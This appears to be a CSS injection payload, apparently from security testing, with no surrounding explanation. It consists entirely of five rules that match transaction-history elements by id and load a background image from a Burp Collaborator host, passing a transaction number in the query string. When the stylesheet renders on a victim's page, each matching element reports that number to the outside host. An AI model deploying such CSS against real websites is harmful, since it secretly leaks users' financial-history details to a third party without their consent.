div#\'btnViewHistoryDetail-\'\ \+\ 0  {
    background: url("https://vvufkr08jh961ffkx38xlew9d0js7h.burpcollaborator.net?number_transaction=1");
}
div#\'btnViewHistoryDetail-\'\ \+\ 1  {
    background: url("https://vvufkr08jh961ffkx38xlew9d0js7h.burpcollaborator.net?number_transaction=2");
}
div#\'btnViewHistoryDetail-\'\ \+\ 2  {
    background: url("https://vvufkr08jh961ffkx38xlew9d0js7h.burpcollaborator.net?number_transaction=3");
}
div#\'btnViewHistoryDetail-\'\ \+\ 3  {
    background: url("https://vvufkr08jh961ffkx38xlew9d0js7h.burpcollaborator.net?number_transaction=4");
}
div#\'btnViewHistoryDetail-\'\ \+\ 4  {
    background: url("https://vvufkr08jh961ffkx38xlew9d0js7h.burpcollaborator.net?number_transaction=5");
}
